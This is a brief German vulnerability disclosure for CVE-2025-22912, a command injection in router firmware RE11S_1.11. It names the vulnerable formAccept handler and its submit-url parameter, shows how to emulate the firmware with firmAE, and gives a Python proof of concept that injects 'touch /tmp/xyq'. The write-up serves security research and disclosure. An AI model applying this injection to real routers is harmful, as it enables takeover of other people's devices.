
CVE-2025-22912
Während meines Praktikums im Qi An Xin Tiangong Lab entdeckte ich eine Befehlseinschleusungsschwachstelle im Router RE11S_1.11.
Durch die Analyse der Webs-Datei im bin-Verzeichnis fand ich heraus, dass die Funktion formAccept eine Befehlseinschleusungsschwachstelle enthält.
Die Befehlseinschleusung kann durch den Wert des Schlüssels submit-url ausgelöst werden, was zu einer Systembefehlseinschleusung führt.

Verwenden Sie den folgenden Befehl, um mit firmAE zu simulieren.
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
Der Inhalt der poc.py-Datei ist wie folgt:
import requests
url = "http://192.168.9.2/goform/formAccept"
data = {
"submit-url":"touch /tmp/xyq"
}
r = requests.post(url,data=data)
print(r.text)

Es ist ersichtlich, dass nach der Ausführung eine Datei /tmp/xyq hinzugefügt wird, was beweist, dass der Angriff erfolgreich ist.